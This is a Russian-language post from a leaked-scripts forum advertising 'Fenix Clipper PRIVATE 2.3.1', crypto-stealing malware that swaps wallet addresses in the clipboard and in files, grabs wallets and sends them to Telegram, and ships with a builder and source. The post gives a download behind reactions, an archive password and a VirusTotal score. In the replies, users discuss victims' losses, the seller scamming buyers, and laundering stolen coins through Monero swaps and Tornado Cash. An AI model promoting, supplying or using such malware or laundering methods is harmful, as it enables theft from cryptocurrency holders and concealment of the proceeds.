Софт - [Fenix Clipper PRIVATE 2.3.1]Клиппер (Clipper) 14+ валют, подмена кошельков в буфере обмена и файлах, Wallet Grabber + билдер + исходные коды. | End Way - форум программирования и сливов различных скриптов
  • Присоединяйтесь к нам в телеграм канал! EndWay канал | EndSoft канал | EWStudio канал
  • Хочешь поставить скрипт, но не умеешь?
    А может ты хочешь свой скрипт на основе слитого?

    Тогда добро пожаловать в нашу студию разработки!

    Телеграм бот: EWStudioBot
    Телеграм канал: EWStudio

Софт [Fenix Clipper PRIVATE 2.3.1]Клиппер (Clipper) 14+ валют, подмена кошельков в буфере обмена и файлах, Wallet Grabber + билдер + исходные коды.

HeroinWinter

Бот
Автор темы
23 Янв 2023
17
255
28
 2023 07 04 192213390[+] Мульти подмена кошельков
(подменяет в любом скопированном тексте и ссылках все кошельки которые есть)
[+] Подмена кошельков в файлах
(Поиск текстовых файлов и массовая замена всех найденных кошельков в них)
[+] Гибко настраиваемые оповещения в телегам бота
1688487590241
[+] Wallet Grabber - отправка в ТГ архивом


Скачать:
[REACTS=1]
Пароль к архиву: @devxstudio[/REACTS]
VirusTotal: Builder_2.3.1.exe (22/71)
 
Like
  • 7
Реакции: 6 users

PapaSander

Сеньор
15 Июн 2023
142
66
28
Однажды знакомый на клиппер попался, 2к$ как не бывало! Я и говорю, пользоваться на мобиле кошелями только надо.
 

PapaSander

Сеньор
15 Июн 2023
142
66
28
clever, да таже фигня, есть и леджеры и кобоваулт) я к тому, что даже холодный от клиппера не спасёт! ты им только подтверждаешь транзу. Опять же мобила спасает, а лучше в сочетании с холодным.
 

CashFlow

Миддл
3 Июл 2023
63
15
8
Покупал данный клиппер с исходами у разраба,потом он выпустил "криптор", понабрал 50$ с клиентов и скамнулся, жаль такого тупого разраба,а клиппер норм только жрет много
 

blyaaaaidina

Бот
25 Июн 2024
47
204
33
PapaSander, ну я думаю , если использовать монеро , делить частями сумму , не выводить на леджер сразу , делать свапы на эфир и заливать их в какой нибудь торнадо кеш , а после долгого усердного запутывания .
 

blyaaaaidina

Бот
25 Июн 2024
47
204
33
PapaSander, понятное дело , что если ты перегнал на 2 биржи , в открытом блокчейне все операции на ладони , леджер это не панацея и не анонимность . просто отличный способ хранения капитала
 
Активность:
Пока что здесь никого нет